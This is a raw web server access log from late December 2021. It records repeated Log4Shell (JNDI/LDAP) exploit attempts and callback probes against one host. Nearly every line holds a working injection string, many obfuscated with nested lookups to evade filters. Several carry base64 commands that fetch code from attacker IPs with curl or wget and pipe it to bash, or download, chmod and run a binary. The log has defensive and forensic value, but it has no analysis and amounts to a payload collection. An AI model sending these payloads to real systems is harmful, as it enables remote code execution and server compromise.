195.54.160.149 - - [25/Dec/2021:23:03:06 +0000] "GET /?x=$%7bjndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo%7d HTTP/1.1" 200 5382 "http://50.116.41.48:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
178.176.202.121 - - [26/Dec/2021:07:52:04 +0000] "GET /${jndi:ldap://121.140.99.236:1389/Exploit} HTTP/1.1" 404 239 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
178.176.202.121 - - [26/Dec/2021:07:52:05 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://121.140.99.236:1389/Exploit}"
195.54.160.149 - - [26/Dec/2021:09:43:05 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=} HTTP/1.1" 200 96 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}"
195.54.160.149 - - [26/Dec/2021:19:30:20 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [26/Dec/2021:19:30:21 +0000] "GET /?x=$%7bjndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo%7d HTTP/1.1" 200 5382 "http://50.116.41.48:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [27/Dec/2021:07:00:43 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=} HTTP/1.1" 200 96 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}"
195.54.160.149 - - [27/Dec/2021:16:36:07 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
164.90.239.160 - - [27/Dec/2021:19:47:59 +0000] "GET / HTTP/1.1" 302 203 "${jndi:dns://50-116-41-48.scanworld.net/ref}" "${jndi:dns://50-116-41-48.scanworld.net/ua}"
195.54.160.149 - - [28/Dec/2021:03:47:35 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=} HTTP/1.1" 200 96 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}"
195.54.160.149 - - [28/Dec/2021:13:21:14 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [28/Dec/2021:13:21:14 +0000] "GET /?x=$%7bjndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo%7d HTTP/1.1" 200 5382 "http://50.116.41.48:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
107.77.225.225 - - [28/Dec/2021:16:39:23 +0000] "GET /?dfeea=${jndi:ldap://50.116.41.48.c75kh6c2vtc0000amee0gd13aueyyyyyb.interact.sh/a} HTTP/1.1" 200 96 "-" "curl/7.64.0"
107.77.225.225 - - [28/Dec/2021:16:39:23 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://50.116.41.48.c75kh6c2vtc0000amee0gd13aueyyyyyb.interact.sh/a}"
166.137.252.110 - - [28/Dec/2021:16:56:07 +0000] "GET /?tyesb=${jndi:ldap://50.116.41.48.c75kh6c2vtc0000amee0gd13aueyyyyyb.interact.sh/a} HTTP/1.1" 302 289 "-" "curl/7.64.0"
166.137.252.110 - - [28/Dec/2021:16:56:07 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://50.116.41.48.c75kh6c2vtc0000amee0gd13aueyyyyyb.interact.sh/a}"
107.77.225.225 - - [28/Dec/2021:20:16:01 +0000] "GET /?kirvp=${jndi:ldap://50.116.41.48.c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a} HTTP/1.1" 200 96 "-" "curl/7.64.0"
107.77.225.225 - - [28/Dec/2021:20:16:02 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://50.116.41.48.c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a}"
166.137.252.110 - - [28/Dec/2021:20:38:28 +0000] "GET /?ayjpo=${jndi:ldap://50.116.41.48.c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a} HTTP/1.1" 302 289 "-" "curl/7.64.0"
166.137.252.110 - - [28/Dec/2021:20:38:28 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://50.116.41.48.c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a}"
195.54.160.149 - - [29/Dec/2021:00:14:14 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=} HTTP/1.1" 200 96 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}"
195.54.160.149 - - [29/Dec/2021:09:55:27 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [29/Dec/2021:09:55:27 +0000] "GET /?x=$%7bjndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo%7d HTTP/1.1" 200 5382 "http://50.116.41.48:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
185.220.101.23 - - [29/Dec/2021:13:04:21 +0000] "GET /?harvj=${jndi:ldap://50.116.41.48.c752sa3k9oeb2eg2ehpgc8fnhkeyyyyyn.domsearch.net/a} HTTP/1.1" 200 96 "-" "curl/7.64.0"
185.220.101.23 - - [29/Dec/2021:13:04:23 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://50.116.41.48.c752sa3k9oeb2eg2ehpgc8fnhkeyyyyyn.domsearch.net/a}"
107.77.223.226 - - [29/Dec/2021:17:11:10 +0000] "GET /?pqevk=${jndi:ldap://50.116.41.48.c769awk2vtc00005kyk0gduriqcyyyyyb.interact.sh/a} HTTP/1.1" 200 96 "-" "curl/7.64.0"
107.77.223.226 - - [29/Dec/2021:17:11:10 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://50.116.41.48.c769awk2vtc00005kyk0gduriqcyyyyyb.interact.sh/a}"
107.77.70.124 - - [29/Dec/2021:17:30:34 +0000] "GET /?ydgte=${jndi:ldap://50.116.41.48.c769awk2vtc00005kyk0gduriqcyyyyyb.interact.sh/a} HTTP/1.1" 302 289 "-" "curl/7.64.0"
107.77.70.124 - - [29/Dec/2021:17:30:34 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://50.116.41.48.c769awk2vtc00005kyk0gduriqcyyyyyb.interact.sh/a}"
195.54.160.149 - - [29/Dec/2021:21:32:51 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=} HTTP/1.1" 200 96 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}"
207.244.248.240 - - [29/Dec/2021:22:56:11 +0000] "GET / HTTP/1.1" 302 203 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//2.58.149.206:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMi41OC4xNDkuMjA2L3JlYWRlcjsgY3VybCAtTyBodHRwOi8vMi41OC4xNDkuMjA2L3JlYWRlcjsgY2htb2QgNzc3IHJlYWRlcjsgLi9yZWFkZXIgcnVubmVy}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//2.58.149.206:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMi41OC4xNDkuMjA2L3JlYWRlcjsgY3VybCAtTyBodHRwOi8vMi41OC4xNDkuMjA2L3JlYWRlcjsgY2htb2QgNzc3IHJlYWRlcjsgLi9yZWFkZXIgcnVubmVy}')"
207.244.248.240 - - [29/Dec/2021:22:56:12 +0000] "GET / HTTP/1.1" 200 5382 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//2.58.149.206:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMi41OC4xNDkuMjA2L3JlYWRlcjsgY3VybCAtTyBodHRwOi8vMi41OC4xNDkuMjA2L3JlYWRlcjsgY2htb2QgNzc3IHJlYWRlcjsgLi9yZWFkZXIgcnVubmVy}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//2.58.149.206:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMi41OC4xNDkuMjA2L3JlYWRlcjsgY3VybCAtTyBodHRwOi8vMi41OC4xNDkuMjA2L3JlYWRlcjsgY2htb2QgNzc3IHJlYWRlcjsgLi9yZWFkZXIgcnVubmVy}')"
195.54.160.149 - - [30/Dec/2021:07:05:12 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
167.71.13.196 - - [30/Dec/2021:08:28:27 +0000] "GET /$%7Bjndi:ldap://167.71.13.196:443/lx-ffff32742930bb01006a6dcd6100000000060d1c%7D?${jndi:ldap://167.71.13.196:443/lx-ffff32742930bb01016a6dcd6100000000342e6e}=${jndi:ldap://167.71.13.196:443/lx-ffff32742930bb01026a6dcd61000000004b1272} HTTP/1.1" 400 347 "-" "${jndi:ldap://167.71.13.196:443/lx-ffff32742930bb01086a6dcd6100000000da51b8}"
162.241.114.189 - - [30/Dec/2021:15:41:21 +0000] "HEAD /?id=${jndi:ldap://162.241.127.99/ae4d14d64d1cbfe8042b12f47bc5e3e43w} HTTP/1.1" 200 - "-" "${jndi:ldap://162.241.127.99/ae4d14d64d1cbfe8042b12f47bc5e3e43w/bcable.net/?id=${jndi:ldap}"
162.241.114.189 - - [30/Dec/2021:15:41:21 +0000] "GET /?id=${jndi:ldap://162.241.127.99/ae4d14d64d1cbfe8042b12f47bc5e3e43w} HTTP/1.1" 200 5382 "-" "${jndi:ldap://162.241.127.99/ae4d14d64d1cbfe8042b12f47bc5e3e43w/bcable.net/?id=${jndi:ldap}"
162.241.114.189 - - [30/Dec/2021:15:41:21 +0000] "HEAD /?id=${jndi:ldap://162.241.127.99/ae4d14d64d1cbfe8042b12f47bc5e3e43w} HTTP/1.1" 302 - "-" "${jndi:ldap://162.241.127.99/ae4d14d64d1cbfe8042b12f47bc5e3e43w/www.bcable.net/?id=${jndi:ldap}"
162.241.114.189 - - [30/Dec/2021:15:41:21 +0000] "HEAD /?id=${jndi:ldap://162.241.127.99/ae4d14d64d1cbfe8042b12f47bc5e3e43w} HTTP/1.1" 301 - "-" "${jndi:ldap://162.241.127.99/ae4d14d64d1cbfe8042b12f47bc5e3e43w/bcable.net/?id=${jndi:ldap}"
162.241.114.189 - - [30/Dec/2021:15:41:21 +0000] "HEAD /?id=${jndi:ldap://162.241.127.99/ae4d14d64d1cbfe8042b12f47bc5e3e43w} HTTP/1.1" 302 - "-" "${jndi:ldap://162.241.127.99/ae4d14d64d1cbfe8042b12f47bc5e3e43w/www.bcable.net/?id=${jndi:ldap}"
195.54.160.149 - - [30/Dec/2021:18:10:50 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=} HTTP/1.1" 200 96 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}"
195.54.160.149 - - [31/Dec/2021:03:46:47 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [31/Dec/2021:14:42:28 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=} HTTP/1.1" 200 96 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}"
199.127.60.104 - - [31/Dec/2021:20:35:29 +0000] "GET / HTTP/1.1" 302 203 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//2.58.149.206:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMi41OC4xNDkuMjA2L3JlYWRlcjsgY3VybCAtTyBodHRwOi8vMi41OC4xNDkuMjA2L3JlYWRlcjsgY2htb2QgNzc3IHJlYWRlcjsgLi9yZWFkZXIgcnVubmVy}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//2.58.149.206:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMi41OC4xNDkuMjA2L3JlYWRlcjsgY3VybCAtTyBodHRwOi8vMi41OC4xNDkuMjA2L3JlYWRlcjsgY2htb2QgNzc3IHJlYWRlcjsgLi9yZWFkZXIgcnVubmVy}')"
